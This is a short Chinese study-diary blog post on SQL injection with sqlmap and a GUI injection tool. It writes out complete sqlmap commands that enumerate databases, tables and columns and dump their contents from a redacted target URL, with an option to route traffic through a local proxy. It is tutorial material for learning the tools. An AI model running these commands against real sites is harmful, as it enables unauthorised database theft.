Cyber Security-Day9(sqlmap和超级sql使用)

1.sqlmap的使用

例子:http://xxxxxxxxxxx?id=*7

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U --dbs

-u 指定地址

--batch 测试过程中, 执行所有默认配置

--technique=     (默认全部使用)

B       基于布尔的盲注

T       基于时间的盲注

E      基于报错的注入

U      基于UNION查询注入

S      基于多语句查询注入

—dbs 所有的数据库

 

 看到所有的库我们指定库去查找所有的表

python sqlmap.py -u "http://xxxxxx.php?id=*7" --batch --random-agent --technique U -d db_math4a11 --tables

—tables 所有的表

 

 接下来根据表去查找列,根据列去查找值

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES --columns

python sqlmap.py -u "http://xxxxxxxxx.php?id=*7" --batch --random-agent --technique U -D information_schema -T TABLES -C ENGINE --dump

如果需要配置BP,使我们可以看到抓包输入的值,GET POST请求,最后加

--proxy https://127.0.0.1:1080

2.超级SQL注入的使用

(1)填入URL

(2)转换为GET或者POST

 

 (3)识别注入

(4)注入完毕,我们去查看注入记录,以及在数据中心设置环境变量,然后去查库,表,列,数值

 

posted @ 2022-07-05 23:53  Arrest  阅读(19)  评论(0编辑  收藏  举报